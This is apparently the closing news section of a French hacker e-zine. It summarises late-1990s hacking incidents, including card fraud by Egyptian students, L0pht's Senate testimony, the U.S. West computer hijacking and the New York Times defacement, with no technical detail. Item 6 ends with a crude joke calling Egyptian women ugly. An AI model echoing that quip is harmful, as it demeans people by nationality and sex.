6) La police égyptienne a arrêté deux étudiants hackers, pour vol et utilisation frauduleuse de carte bancaire. Les criminels ont eu toutefois le temps de détourner 147 000 $, soit plus de 900 000 frs, au cours des sept derniers mois précédant leur arrestation. Les autorités égyptiennes assurent qu'il s'agit du premier crime d'un ressortissant de leur pays sur l'internety. Le plus surprenant est qu'ils ont dépensé l'intégralité de ce montant pour des photos et films pornographiques payant sur le Web! A croire qu'en Egypte, les filles, elles sont moches...
7) Un collectif de pirates, le Lopht, a affirmé au Sénat américain en juin 1998 leur capacité à "planter" en une demi-heure la dorsale de l'internet US. Avec leur ego surdimmensionné, tous ces pirates vont bien finir par motiver les politiques à une sécurisation extrême du net. Et là finie la liberté!
8) Un jeune pirate informatique de 28 ans, Aaron Blosser a détourné plus de 2 500 ordinateurs de la compagnie de téléphone américaine U.S. west (Phoenix, USA) pour tenter de résoudre une énigme mathématique vieille de 350 ans. Il aurait également obtenu les mots de passe de 15 000 postes de travail de la compagnie, qu'il aurait publiés sur l'internet. L'affaire a été découverte lorsqu'il est apparu que les ordinateurs de l'entreprise U.S. West mettaient 5 minutes à retrouver des numéros de téléphone, au lieu de 5 secondes en temps normal. Il va s'amuser comme un fous le gars avec son numéro de matricule!
9) Le site du journal le New York Times s'est fait piraté, début seprembre, par un adorateur de Kevin Mitnick. Le hacker a modifié la première page du site en demandant le libération du "condor". Pour lui, il est grand temps d'ouvrir la cage à l'oiseau Mitnick!
Voilà qui va clore cet E-mag en espérant qu'il vous a plu! Si vous avez des commentaires à faire ou des suggestions, écrivez à clad_strife@hotmail.com.
Clad Strife